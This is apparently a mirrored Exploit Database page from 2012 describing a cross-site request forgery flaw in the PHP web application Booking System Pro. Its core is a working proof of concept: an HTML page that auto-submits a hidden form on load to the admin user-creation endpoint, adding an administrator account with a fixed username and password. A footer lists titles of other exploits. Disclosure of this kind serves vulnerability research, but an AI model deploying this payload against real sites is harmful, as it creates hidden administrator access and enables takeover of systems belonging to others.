Booking System Pro – Cross-Site Request Forgery

Exploit Database
13 阅读

作者： DaOne

日期： 2012-08-30
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/20942/

# Exploit Title: Booking System Pro CSRF Vulnerability
# Date: 28/08/2012
# Author: DaOne (@LibyanCA)
# Vendor: http://www.neptunescripts.com/products
# Price: $39


# CSRF Add Admin

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://[target]/admin/users/add">
<input type="hidden" name="data[User][name]" value="webadmin"/>
<input type="hidden" name="data[User][username]" value="webadmin">
<input type="hidden" name="data[User][password]" value="pass123">
<input type="hidden" name="data[User][email]" value="admin@email.com">
<input type="hidden" name="data[User][phone]" value=""/>
<input type="hidden" name="data[User][role]" value="admin"/>
</form>
</body>
</html>

last Exploits
Booking System Pro – Cross-Site Request Forgery的更多信息

Online Hotel Reservation System 1.0 – ‘person’ time-based SQL Injection：
Art Gallery Management System Project in PHP v 1.0 – SQL injection：
WordPress Plugin Simple Gmail Login – Stack Trace Information Disclosure：
Project Pier – Arbitrary File Upload (Metasploit)：
vBulletin – ‘misc.php’ Template Name Arbitrary Code Execution (Metasploit)：
Joomla! Component JE Auto 1.0 – SQL Injection：
ViArt Shop Enterprise 4.1 – Arbitrary Command Execution：
TWiki 5.0.1 – ‘origurl’ Cross-Site Scripting：